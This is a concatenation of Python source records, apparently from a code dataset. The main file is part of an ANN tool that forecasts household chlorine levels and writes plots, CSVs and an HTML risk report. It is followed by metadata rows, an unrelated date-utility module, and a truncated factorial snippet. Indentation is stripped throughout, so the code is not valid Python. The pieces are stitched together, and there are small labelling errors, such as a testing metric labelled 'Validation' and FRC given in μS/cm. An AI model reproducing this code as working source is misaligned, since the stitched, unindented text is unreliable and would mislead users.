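"""Exports the prediction result tables to CSV files alongside the given filename; when post-processing has been run, the post-processed tables overwrite the raw ensemble tables."""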
self.avg_case_results_am.to_csv(
os.path.splitext(filename)[0] + "_average_case_am.csv", index=False
)
self.avg_case_results_pm.to_csv(
os.path.splitext(filename)[0] + "_average_case_pm.csv", index=False
)
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
self.worst_case_results_am.to_csv(
os.path.splitext(filename)[0] + "_worst_case_am.csv", index=False
)
self.worst_case_results_pm.to_csv(
os.path.splitext(filename)[0] + "_worst_case_pm.csv", index=False
)
if self.post_process_check == True:
self.avg_case_results_am_post.to_csv(
os.path.splitext(filename)[0] + "_average_case_am.csv", index=False
)
self.avg_case_results_pm_post.to_csv(
os.path.splitext(filename)[0] + "_average_case_pm.csv", index=False
)
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
self.worst_case_results_am_post.to_csv(
os.path.splitext(filename)[0] + "_worst_case_am.csv", index=False
)
self.worst_case_results_pm_post.to_csv(
os.path.splitext(filename)[0] + "_worst_case_pm.csv", index=False
)
def generate_model_performance(self):
"""Generates training performance graphs
Plots boxplots of the model performance metrics (MSE and R^2 across the training, validation,
and testing sets) after training and returns a base64 encoded image. The NN has to be trained
first, otherwise the image will be empty.
Returns: Base64 data stream"""
fig, axs = plt.subplots(1, 2, sharex=True)
ax = axs[0]
ax.boxplot(
[self.total_mse_train, self.total_mse_val, self.total_mse_test],
labels=["Training", "Validation", "Testing"],
)
ax.set_title("Mean Squared Error")
tr_legend = "Training Avg MSE: {mse:.4f}".format(mse=self.avg_mse_train)
val_legend = "Validation Avg MSE: {mse:.4f}".format(mse=self.avg_mse_val)
ts_legend = "Testing Avg MSE: {mse:.4f}".format(mse=self.avg_mse_test)
ax.legend([tr_legend, val_legend, ts_legend])
ax = axs[1]
ax.boxplot(
[
self.total_rsquared_train,
self.total_rsquared_val,
self.total_rsquared_test,
],
labels=["Training", "Validation", "Testing"],
)
ax.set_title("R^2")
tr_legend = "Training Avg. R^2: {rs:.3f}".format(rs=self.avg_rsq_train)
val_legend = "Validation Avg. R^2: {rs:.3f}".format(rs=self.avg_rsq_val)
ts_legend = "Validation Avg. R^2: {rs:.3f}".format(rs=self.avg_rsq_test)
ax.legend([tr_legend, val_legend, ts_legend])
fig.suptitle(
"Performance metrics across 100 training runs on "
+ str(self.epochs)
+ " epochs, with "
+ str(self.layer1_neurons)
+ " neurons on hidden layer."
)
fig.set_size_inches(12, 8)
# plt.show()
# Uncomment the next lines to save the graph to disk
# plt.savefig("model_metrics\\" + str(self.epochs) + "_epochs_" + str(self.layer1_neurons) + "_neurons.png",
# dpi=100)
# plt.close()
plt.show()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format='png')
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def generate_2d_scatterplot(self):
"""Generate a 2d scatterplot of the predictions
Plots three, 2-dimensional scatterplots of the predictions as a function of the inputs
The 3 scatterplots are plotting: predictions vs se1_frc and water temperature, predictions
vs water conductivity and water temperature, and predictions vs se1_frc and water conductivity.
A histogram of the prediction set is also generated and plotted. A prediction using the
predict() method must be made first.
Returns: a base64 data represenation of the image."""
df = self.results
# Uncomment the following line to load the results directly from a csv file
# df = pd.read_csv('results.csv')
# Filter out outlier values
df = df.drop(df[df[FRC_IN] > 2.8].index)
frc = df[FRC_IN]
watt = df[WATTEMP]
cond = df[COND]
c = df["median"]
# sort data for the cdf
sorted_data = np.sort(c)
# The following lines of code calculate the width of the histogram bars
# and align the range of the histogram and the pdf
if min(c) < 0:
lo_limit = 0
else:
lo_limit = round(min(c), 2)
logging.info(lo_limit)
if max(c) <= 0.75:
hi_limit = 0.75
elif max(c) < 1:
hi_limit = 1
elif max(c) <= 1.5:
hi_limit = 1.5
else:
# Cap the histogram range at 2 mg/L; larger predictions are filtered out below.
hi_limit = 2
# One bin per 0.05 mg/L; cast to int so np.linspace accepts the bin count.
divisions = int(round((hi_limit - lo_limit) / 0.05)) + 1
logging.info(divisions)
# Get the data between the limits
sorted_data = sorted_data[sorted_data > lo_limit]
sorted_data = sorted_data[sorted_data < hi_limit]
# create a colorbar for the se4_frc and divide it into 0.2 mg/L intervals
cmap = plt.cm.jet_r
cmaplist = [cmap(i) for i in range(cmap.N)]
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"Custom cmap", cmaplist, cmap.N
)
bounds = np.linspace(0, 1.4, 8)
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
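# Four-panel figure: predictions (coloured by median household FRC) against each pair of inputs, plus a histogram and CDF of the predicted household FRC.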
fig = plt.figure(figsize=(19.2, 10.8), dpi=100)
ax = fig.add_subplot(221)
img = ax.scatter(frc, watt, c=c, s=5, cmap=cmap, norm=norm, alpha=1)
ax.set_xlabel("FRC at tapstand (mg/L)")
ax.set_ylabel("Water Temperature (" + "\u00b0" + "C)")
ax.grid(linewidth=0.2)
ax = fig.add_subplot(222)
img = ax.scatter(frc, cond, c=c, s=5, cmap=cmap, norm=norm, alpha=1)
ax.set_xlabel("FRC at tapstand (mg/L)")
ax.set_ylabel("Water Conductivity (\u03BCS/cm)")
ax.grid(linewidth=0.2)
ax = fig.add_subplot(223)
img = ax.scatter(watt, cond, c=c, s=5, cmap=cmap, norm=norm, alpha=1)
ax.set_xlabel("Water Temperature (" + "\u00b0" + "C)")
ax.set_ylabel("Water Conductivity (\u03BCS/cm)")
ax.grid(linewidth=0.2)
ax = fig.add_subplot(224)
img = ax.hist(
c,
bins=np.linspace(lo_limit, hi_limit, divisions),
edgecolor="black",
linewidth=0.1,
)
ax.grid(linewidth=0.1)
line02 = ax.axvline(0.2, color="r", linestyle="dashed", linewidth=2)
line03 = ax.axvline(0.3, color="y", linestyle="dashed", linewidth=2)
ax.set_xlabel("FRC at household (mg/L)")
ax.set_ylabel("# of instances")
axcdf = ax.twinx()
(cdf,) = axcdf.step(sorted_data, np.arange(sorted_data.size), color="g")
ax.legend(
(line02, line03, cdf), ("0.2 mg/L", "0.3 mg/L", "CDF"), loc="center right"
)
ax2 = fig.add_axes([0.93, 0.1, 0.01, 0.75])
cb = mpl.colorbar.ColorbarBase(
ax2,
cmap=cmap,
norm=norm,
spacing="proportional",
ticks=bounds,
boundaries=bounds,
)
cb.ax.set_ylabel("FRC at se4 (mg/L)", rotation=270, labelpad=20)
plt.show()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format="png")
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def generate_input_info_plots(self, filename):
"""Generates histograms of the inputs to the ANN
Plots one histogram for each input field on the neural network
along with the mean and median values."""
df = self.datainputs
# df = df.drop(df[df["se1_frc"] > 2.8].index)
frc = df[FRC_IN]
watt = df[WATTEMP]
cond = df[COND]
dfo = self.file
dfo = dfo.drop(dfo[dfo[FRC_IN] > 2.8].index)
frc4 = dfo[FRC_OUT]
fig = plt.figure(figsize=(19.2, 10.8), dpi=100)
# fig.suptitle('Total samples: '+ str(len(frc))) # +
# "\n" + "SWOT version: " + self.software_version +
# "\n" + "Input Filename: " + os.path.basename(self.input_filename) +
# "\n" + "Generated on: " + self.today)
axInitialFRC = fig.add_subplot(221)
axInitialFRC.hist(frc, bins=20, edgecolor="black", linewidth=0.1)
axInitialFRC.set_xlabel("Initial FRC (mg/L)")
axInitialFRC.set_ylabel("# of instances")
mean = round(np.mean(frc), 2)
median = np.median(frc)
mean_line = axInitialFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axInitialFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axInitialFRC.legend(
(mean_line, median_line),
("Mean: " + str(mean) + " mg/L", "Median: " + str(median) + " mg/L"),
)
ax = fig.add_subplot(222)
ax.hist(watt, bins=20, edgecolor="black", linewidth=0.1)
ax.set_xlabel("Water Temperature (" + "\u00b0" + "C)")
ax.set_ylabel("# of instances")
mean = round(np.mean(watt), 2)
median = np.median(watt)
mean_line = ax.axvline(mean, color="r", linestyle="dashed", linewidth=2)
median_line = ax.axvline(median, color="y", linestyle="dashed", linewidth=2)
ax.legend(
(mean_line, median_line),
(
"Mean: " + str(mean) + "\u00b0" + "C",
"Median: " + str(median) + "\u00b0" + "C",
),
)
ax = fig.add_subplot(223)
ax.hist(cond, bins=20, edgecolor="black", linewidth=0.1)
ax.set_xlabel("Water Conductivity (\u03BCS/cm)")
ax.set_ylabel("# of instances")
mean = round(np.mean(cond), 2)
median = np.median(cond)
mean_line = ax.axvline(mean, color="r", linestyle="dashed", linewidth=2)
median_line = ax.axvline(median, color="y", linestyle="dashed", linewidth=2)
ax.legend(
(mean_line, median_line),
(
"Mean: " + str(mean) + " \u03BCS/cm",
"Median: " + str(median) + " \u03BCS/cm",
),
)
axHouseholdFRC = fig.add_subplot(224)
axHouseholdFRC.hist(
frc4, bins=np.linspace(0, 2, 41), edgecolor="black", linewidth=0.1
)
axHouseholdFRC.set_xlabel("Household FRC (\u03BCS/cm)")
axHouseholdFRC.set_ylabel("# of instances")
mean = round(np.mean(frc4), 2)
median = np.median(frc4)
mean_line = axHouseholdFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axHouseholdFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axHouseholdFRC.legend(
(mean_line, median_line),
(
"Mean: " + str(mean) + " \u03BCS/cm",
"Median: " + str(median) + " \u03BCS/cm",
),
)
fig.savefig(os.path.splitext(filename)[0] + ".png", format="png")
# plt.show()
# create figure for initial and household FRC separately in a single image
figFRC = plt.figure(figsize=(19.2 / 1.45, 6.4), dpi=100)
axInitialFRC = figFRC.add_subplot(211)
axInitialFRC.hist(frc, bins=20, edgecolor="black", linewidth=0.1)
axInitialFRC.set_xlabel("Initial FRC (mg/L)")
axInitialFRC.set_ylabel("# of instances")
mean = round(np.mean(frc), 2)
median = np.median(frc)
mean_line = axInitialFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axInitialFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axInitialFRC.legend(
(mean_line, median_line),
("Mean: " + str(mean) + " mg/L", "Median: " + str(median) + " mg/L"),
)
axHouseholdFRC = figFRC.add_subplot(212)
axHouseholdFRC.hist(
frc4, bins=np.linspace(0, 2, 41), edgecolor="black", linewidth=0.1
)
axHouseholdFRC.set_xlabel("Household FRC (mg/L)")
axHouseholdFRC.set_ylabel("# of instances")
mean = round(np.mean(frc4), 2)
median = np.median(frc4)
mean_line = axHouseholdFRC.axvline(
mean, color="r", linestyle="dashed", linewidth=2
)
median_line = axHouseholdFRC.axvline(
median, color="y", linestyle="dashed", linewidth=2
)
axHouseholdFRC.legend(
(mean_line, median_line),
("Mean: " + str(mean) + " mg/L", "Median: " + str(median) + " mg/L"),
)
figFRC.savefig(os.path.splitext(filename)[0] + "-frc.jpg", format="jpg")
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format="png")
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def generate_html_report(self, filename, storage_target):
"""Generates an html report of the SWOT results. The report
is saved on disk under the name 'filename'."""
df = self.datainputs
frc = df[FRC_IN]
# self.generate_input_info_plots(filename).decode('UTF-8')
hist, risk, pred = self.results_visualization(filename, storage_target)
hist.decode("UTF-8")
risk.decode("UTF-8")
pred.decode("UTF-8")
# scatterplots_b64 = self.generate_2d_scatterplot().decode('UTF-8')
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
avg_html_table, worst_html_table = self.prepare_table_for_html_report(
storage_target
)
else:
avg_html_table = self.prepare_table_for_html_report(storage_target)
skipped_rows_table = self.skipped_rows_html()
doc, tag, text, line = Doc().ttl()
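# Build the HTML report with yattag's Doc helper (tag/text/line shortcuts).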
with tag("h1", klass="title"):
text("SWOT ARTIFICIAL NEURAL NETWORK REPORT")
with tag("p", klass="swot_version"):
text("SWOT ANN Code Version: " + self.software_version)
with tag("p", klass="input_filename"):
text("Input File Name: " + os.path.basename(self.input_filename))
with tag("p", klass="date"):
text("Date Generated: " + self.today)
with tag("p", klass="time_difference"):
text(
"Average time between tapstand and household: "
+ str(int(self.avg_time_elapsed // 3600))
+ " hours and "
+ str(int((self.avg_time_elapsed // 60) % 60))
+ " minutes"
)
with tag("p"):
text("Total Samples: " + str(len(frc)))
if self.post_process_check == False:
with tag("h2", klass="Header"):
text("Predicted Risk - Raw Ensemble:")
else:
with tag("h2", klass="Header"):
text("Predicted Risk - Post-Processed Ensemble:")
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
with tag("p", klass="Predictions Fig Text"):
text(
"Household FRC forecast from an ensemble of "
+ str(self.network_count)
+ " ANN models. The predictions of each model are grouped into a probability density function to predict the risk of FRC below threshold values of 0.20 mg/L using a fixed input variable set for worst case and average case scenarios (shown in the risk tables below). Note that if FRC is collected using pool testers instead of a cholorimeter, the predicted FRC may be disproportionately clustered towards the centre of the observations, resulting in some observations with low FRC to not be captured within the ensemble forecast. In these cases, the predicted risk in the next figure and in the subsequent risk tables may be underpredicted. Average case predictions use median collected values for conductivity and water temperature; worst-case scenario uses 95th percentile values for conductivity and water temeperature"
)
with tag("div", id="Predictions Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Predictions_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Predictions_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
with tag("p", klass="Risk Fig Text"):
text(
"Figure and tables showing predicted risk of household FRC below 0.2 mg/L for average and worst case scenarios for both AM and PM collection. Risk obtained from forecast pdf (above) and taken as cumulative probability of houeshold FRC below 0.2 mg/L. Note that 0% predicted risk of household FRC below 0.2 mg/L does not mean that there is no possibility of household FRC being below 0.2 mg/L, simply that the predicted risk is too low to be measured. The average case target may, in some, cases be more conservative than the worst case targets as the worst case target is derived on the assumption that higher conductivity and water temperature will lead to greater decay (as confirmed by FRC decay chemisty and results at past sites). However, this may not be true in all cases, so the most conservative target is always recommended."
)
with tag("div", id="Risk Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Risk_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(os.path.splitext(filename)[0] + "_Risk_Fig.png")
# + '" type="image/jpeg"></object>'
# )
with tag("h2", klass="Header"):
text("Average Case Targets Table")
with tag("table", id="average case table"):
doc.asis(avg_html_table)
with tag("h2", klass="Header"):
text("Worst Case Targets Table")
with tag("table", id="worst case table"):
doc.asis(worst_html_table)
with tag("p", klass="Histograms Text"):
text(
"Histograms for the input variables used to generate predictions and risk recommendations above. Average case and worst case conductivity and water temperature are shown for context of values used to generate targets."
)
with tag("div", id="Histograms"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Histograms_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Histograms_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
else:
with tag("p", klass="Predictions Fig Text"):
text(
"Household FRC forecast from an ensemble of "
+ str(self.network_count)
+ " ANN models. The predictions of each model are grouped into a probability density function to predict the risk of FRC below threshold values of 0.20 mg/L using a fixed input variable set(shown in the risk table below). Note that if FRC is collected using pool testers instead of a cholorimeter, the predicted FRC may be disproportionately clustered towards the centre of the observations, resulting in some observations with low FRC to not be captured within the ensemble forecast. In these cases, the predicted risk in the next figure and in the subsequent risk table may be underpredicted."
)
with tag("div", id="Predictions Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Predictions_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Predictions_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
with tag("p", klass="Risk Fig Text"):
text(
"Figure and tables showing predicted risk of household FRC below 0.2 mg/L for both AM and PM collection. Risk obtained from forecast probability density function (above) and taken as cumulative probability of houeshold FRC below 0.2 mg/L. Note that 0% predicted risk of household FRC below 0.2 mg/L does not mean that there is no possibility of household FRC being below 0.2 mg/L, simply that the predicted risk is too low to be measured."
)
with tag("div", id="Risk Graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Risk_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(os.path.splitext(filename)[0] + "_Risk_Fig.png")
# + '" type="image/jpeg"></object>'
# )
with tag("h2", klass="Header"):
text("Targets Table")
with tag("table", id="average case table"):
doc.asis(avg_html_table)
with tag("p", klass="Histograms Text"):
text(
"Histograms for the input variables used to generate predictions and risk recommendations above."
)
with tag("div", id="Histograms"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Histograms_Fig.png"
),
)
# doc.asis('<object data="cid:'+os.path.basename(os.path.splitext(filename)[0]+'.PNG') + '" type="image/jpeg"></object>')
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Histograms_Fig.png"
# )
# + '" type="image/jpeg"></object>'
# )
with tag("h2", klass="Header"):
text("Model Diagnostic Figures")
with tag("p", klass="Performance Indicator General Text"):
text(
"These figures evaluate the performance of the ANN ensemble model after training. These figures serve as an indicator of the similarity between the distribution of forecasts produced by the ANN ensembles and the observed data and can be used to evaluate the soundness of the models, and of the confidence we can have in the targets."
)
with tag("p", klass="Performance annotation 1"):
text(
"Subplot A: Household FRC forecasts from an ensemble of"
+ str(self.network_count)
+ " neural networks using the full provided dataset."
)
with tag("p", klass="Performance annotation 2"):
text(
"Subplot B: Confidence Interval (CI) reliability diagram. Each point shows the percentage of observations captured within each ensemble CI. An ideal model will have all points on the 1:1 line. If points are below the line, indicates forecast underdispersion (may lead to overly optimistic targets). If points are above the line, indicates overdispersion (may result in overly conservative targets)."
)
with tag("p", klass="Performance annotation 3"):
text(
"Subplot C: Rank Histogram. This creates a histogram of the relative location of all recorded observations relative to each ensemble member. An ideal model has a flat rank histogram. A U-shaped rank histogram indicates forecast underdispersion (may lead to overly optimistic targets). An arch-shaped rank histogram indicates overdispersion (may result in overly conservative targets)."
)
with tag("div", id="diagnostic_graphs"):
doc.stag(
"img",
src=os.path.basename(
os.path.splitext(filename)[0] + "_Calibration_Diagnostic_Figs.png"
),
)
# doc.asis(
# '<object data="'
# + os.path.basename(
# os.path.splitext(filename)[0] + "_Calibration_Diagnostic_Figs.png"
# )
# + '" type="image/jpeg"></object>'
# )
doc.asis(skipped_rows_table)
totalmatches = 0
if len(self.ruleset):
with tag("ul", id="ann_ruleset"):
for rule in self.ruleset:
totalmatches += rule[2]
line("li", "%s. Matches: %d" % (rule[0], rule[2]))
with tag("div", id="pythonSkipped_count"):
text(totalmatches)
file = open(filename, "w+")
file.write(doc.getvalue())
file.close()
return doc.getvalue()
def generate_metadata(self):
metadata = {}
metadata["average_time"] = self.avg_time_elapsed # in seconds
return metadata
def prepare_table_for_html_report(self, storage_target):
"""Formats the results into an html table for display."""
avg_table_df = pd.DataFrame()
avg_table_df["Input FRC (mg/L)"] = self.avg_case_results_am[FRC_IN]
avg_table_df["Storage Duration for Target"] = storage_target
if WATTEMP in self.datainputs.columns:
avg_table_df["Water Temperature (Degrees C)"] = self.avg_case_results_am[
WATTEMP
]
if COND in self.datainputs.columns:
avg_table_df[
"Electrical Conductivity (s*10^-6/cm)"
] = self.avg_case_results_am[COND]
if self.post_process_check == False:
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - AM Collection"
] = np.round(self.avg_case_results_am["median"], decimals=3)
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - PM Collection"
] = np.round(self.avg_case_results_pm["median"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AM Collection"
] = np.round(self.avg_case_results_am["probability<=0.20"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(self.avg_case_results_pm["probability<=0.20"], decimals=3)
# avg_table_df['Predicted Risk of Household FRC below 0.30 mg/L'] = self.avg_case_results['probability<=0.30']
else:
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - AM Collection"
] = np.round(self.avg_case_results_am_post["median"], decimals=3)
avg_table_df[
"Median Predicted Household FRC Concentration (mg/L) - PM Collection"
] = np.round(self.avg_case_results_pm_post["median"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AM Collection"
] = np.round(self.avg_case_results_am_post["probability<=0.20"], decimals=3)
avg_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(self.avg_case_results_pm_post["probability<=0.20"], decimals=3)
# avg_table_df['Predicted Risk of Household FRC below 0.30 mg/L'] = self.avg_case_results['probability<=0.30']
str_io = io.StringIO()
avg_table_df.to_html(buf=str_io, table_id="annTable")
avg_html_str = str_io.getvalue()
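# The worst-case table is only produced when water temperature or conductivity data are available.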
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
worst_table_df = pd.DataFrame()
worst_table_df["Input FRC (mg/L)"] = self.worst_case_results_am[FRC_IN]
worst_table_df["Storage Duration for Target"] = storage_target
if WATTEMP in self.datainputs.columns:
# Plain-text header: LaTeX markup would appear literally in the HTML table.
worst_table_df[
"Water Temperature (Degrees C)"
] = self.worst_case_results_am[WATTEMP]
if COND in self.datainputs.columns:
worst_table_df[
"Electrical Conductivity (s*10^-6/cm)"
] = self.worst_case_results_am[COND]
worst_table_df["Storage Duration for Target"] = storage_target
if self.post_process_check == False:
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - AM Collection"
] = np.round(self.worst_case_results_am["median"], decimals=3)
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - PM Collection"
] = np.round(self.worst_case_results_pm["median"], decimals=3)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AMM Collection"
] = np.round(
self.worst_case_results_am["probability<=0.20"], decimals=3
)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(
self.worst_case_results_pm["probability<=0.20"], decimals=3
)
else:
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - AM Collection"
] = np.round(self.worst_case_results_am_post["median"], decimals=3)
worst_table_df[
"Median Predicted FRC level at Household (mg/L) - PM Collection"
] = np.round(self.worst_case_results_pm_post["median"], decimals=3)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - AMM Collection"
] = np.round(
self.worst_case_results_am_post["probability<=0.20"], decimals=3
)
worst_table_df[
"Predicted Risk of Household FRC below 0.20 mg/L - PM Collection"
] = np.round(
self.worst_case_results_pm_post["probability<=0.20"], decimals=3
)
# worst_table_df['Predicted Risk of Household FRC below 0.30 mg/L'] = self.worst_case_results['probability<=0.30']
str_io = io.StringIO()
worst_table_df.to_html(buf=str_io, table_id='annTable')
worst_html_str = str_io.getvalue()
return avg_html_str, worst_html_str
else:
return avg_html_str
def skipped_rows_html(self):
if self.skipped_rows.empty:
return ""
printable_columns = [
"ts_datetime",
FRC_IN,
"hh_datetime",
FRC_OUT,
WATTEMP,
COND,
]
required_columns = [rule[1] for rule in self.ruleset]
doc, tag, text = Doc().tagtext()
with tag(
"table",
klass="table center fill-whitespace",
id="pythonSkipped",
border="1",
):
with tag("thead"):
with tag("tr"):
for col in printable_columns:
with tag("th"):
text(col)
with tag("tbody"):
for (_, row) in self.skipped_rows[printable_columns].iterrows():
with tag("tr"):
for col in printable_columns:
with tag("td"):
# check if required value in cell is nan
if col in required_columns and (
not row[col] or row[col] != row[col]
):
with tag("div", klass="red-cell"):
text("")
else:
text(row[col])
return doc.getvalue()
def valid_dates(self, series):
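"""Returns a boolean mask over the series marking rows whose date value cannot be parsed (True = invalid or missing)."""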
mask = []
for i in series.index.to_numpy():
row = series[i]
if row is None:
mask.append(True)
continue
if isinstance(row, str) and not row.replace(".", "", 1).isdigit():
try:
datetime.datetime.strptime(
row[:16].replace("/", "-"), self.xl_dateformat
)
mask.append(False)
except:
mask.append(True)
else:
try:
start = float(row)
start = xldate_as_datetime(start, datemode=0)
mask.append(False)
except:
mask.append(True)
return mask
def execute_rule(self, description, column, matches):
rule = (description, column, sum(matches))
self.ruleset.append(rule)
if sum(matches):
self.file.drop(self.file.loc[matches].index, inplace=True)
def run_swot(self, input_file, results_file, report_file, storage_target):
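"""Runs the full SWOT workflow: import the data, train the ensemble, evaluate calibration, post-process, generate predictions, and export the CSV results and HTML report."""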
now = datetime.datetime.now()
directory = (
"model_retraining"
+ os.sep
+ now.strftime("%m%d%Y_%H%M%S")
+ "_"
+ os.path.basename(input_file)
)
# Uncomment for Excel processing
# file = pd.read_excel(input_file)
file = pd.read_csv(input_file)
# Support for 3 different input templates: se1_frc, ts_frc1, and ts_frc
# Rebind the module-level column-name constants so the rest of the module uses
# the template detected here (without the global statement these assignments
# would only create unused local variables).
global FRC_IN, WATTEMP, COND, FRC_OUT
if "se1_frc" in file.columns:
FRC_IN = "se1_frc"
WATTEMP = "se1_wattemp"
COND = "se1_cond"
FRC_OUT = "se4_frc"
elif "ts_frc1" in file.columns:
FRC_IN = "ts_frc1"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc1"
elif "ts_frc" in file.columns:
FRC_IN = "ts_frc"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc"
self.import_data_from_csv(input_file)
self.set_up_model()
self.train_SWOT_network(directory)
self.calibration_performance_evaluation(report_file)
self.post_process_cal()
# self.full_performance_evaluation(directory)
self.set_inputs_for_table(storage_target)
self.predict()
self.display_results()
self.export_results_to_csv(results_file)
self.generate_html_report(report_file, storage_target)
metadata = self.generate_metadata()
return metadata
| 42.000877 | 855 | 0.519477 | 17,125 | 143,685 | 4.134482 | 0.053723 | 0.026256 | 0.016158 | 0.023135 | 0.774459 | 0.743387 | 0.714391 | 0.692442 | 0.669152 | 0.651371 | 0 | 0.051173 | 0.370846 | 143,685 | 3,420 | 856 | 42.013158 | 0.732046 | 0.067759 | 0 | 0.615516 | 0 | 0.002734 | 0.118613 | 0.001051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008886 | false | 0 | 0.006494 | 0 | 0.02324 | 0.001367 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cbc1c2cfd82e096e87227121e7b6641e2523065 | 634 | py | Python | desktop_shop/util.py | Alex92rus/desktop_shop | 305caf263b56b279e46d5945285189673b868988 | [
"MIT"
] | null | null | null | desktop_shop/util.py | Alex92rus/desktop_shop | 305caf263b56b279e46d5945285189673b868988 | [
"MIT"
] | null | null | null | desktop_shop/util.py | Alex92rus/desktop_shop | 305caf263b56b279e46d5945285189673b868988 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 14 16:31:46 2020
@author: Korean_Crimson
"""
import datetime
def generate_timestamp() -> str:
'''Generates date+timestamp of current time'''
return datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
def get_current_date() -> str:
'''Returns current date'''
return datetime.datetime.now().strftime('%Y-%m-%d')
def validate_date_string(date_string) -> bool:
'''Checks if passed string can be converted to date'''
try:
datetime.datetime.strptime(date_string, '%Y-%m-%d')
valid = True
except ValueError:
valid = False
return valid
| 24.384615 | 60 | 0.648265 | 87 | 634 | 4.62069 | 0.609195 | 0.119403 | 0.022388 | 0.124378 | 0.179104 | 0.179104 | 0.179104 | 0.179104 | 0 | 0 | 0 | 0.02554 | 0.197161 | 634 | 25 | 61 | 25.36 | 0.764244 | 0.305994 | 0 | 0 | 1 | 0 | 0.069544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
7cd63e9f63f8e91c04efeef40461ed815c84dfc9 | 143 | py | Python | BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py | Jonathan1214/learn-python | 19d0299b30e953069f19402bff5c464c4d5580be | [
"MIT"
] | null | null | null | BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py | Jonathan1214/learn-python | 19d0299b30e953069f19402bff5c464c4d5580be | [
"MIT"
] | null | null | null | BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py | Jonathan1214/learn-python | 19d0299b30e953069f19402bff5c464c4d5580be | [
"MIT"
] | null | null | null | #coding:utf-8
# Problem: use recursion to compute 5!.
def factorial(num):
if num in (0,1):
return 1
